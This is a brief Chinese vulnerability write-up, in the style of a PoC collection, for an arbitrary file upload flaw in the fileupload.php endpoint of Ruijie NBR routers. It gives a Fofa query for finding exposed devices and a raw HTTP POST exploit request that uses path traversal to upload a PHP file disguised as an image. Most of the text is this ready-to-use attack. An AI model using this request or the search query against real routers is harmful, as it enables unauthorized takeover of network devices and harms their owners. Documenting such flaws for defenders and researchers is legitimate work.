简介
nbr是一款高性能,高安全性的一款的稳定的网络边界路由器设备,具备强大的安全功能,能够有效保护网络免受恶意攻击和数据泄露。
漏洞描述
锐捷 NBR 路由器 fileupload.php文件存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件到服务器获取服务器权限
影响范围
锐捷 NBR 路由器
Fofa:
app="Ruijie-NBR路由器"
漏洞复现
POST /ddi/server/fileupload.php?uploadDir=../../4321&name=1234.php HTTP/1.1
Host:
Accept: text/plain, */*; q=0.01
Content-Disposition: form-data; name="file"; filename="111.php"
Content-Type: image/jpeg
Content-Length: 32